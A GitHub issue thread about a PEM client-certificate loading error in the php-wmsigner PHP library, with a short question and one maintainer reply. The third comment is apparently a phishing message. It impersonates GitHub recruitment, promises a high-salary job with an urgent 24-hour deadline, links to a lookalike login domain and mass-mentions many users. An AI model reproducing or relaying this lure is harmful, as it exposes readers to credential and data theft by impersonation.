### ISSUE TITLE
could not load PEM client certificate

### ISSUE THREAD

**Issue by parastooam** [baibaratsky/php-wmsigner#18]
my mode is webpro and the code is: 

      $request->lightAuth('certificate.p12', str_random(5), '');

what does this error mean?

Error while performing request (could not load PEM client certificate, OpenSSL error error:0909006C:PEM routines:get_name:no start line, (no key found, wrong pass phrase, or wrong file format?))

**Comment by baibaratsky** [comment]
Did you try to specify an absolute path to the certificate?

**Comment by alexandresimoesf** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
WingHEX, @Tusgavin, @vidalpaul, @starit, @rose-pace, @Farhantaj, @mattr-2102, @An0nCrypto, @zalalov, @nacht, @fyfirman, @daviddao, @antiquatedicecream, @netecho, @EmmyJoel, @LinAsan-1205, @LegalPrimes, @psiva, @mhkna, @heysourin
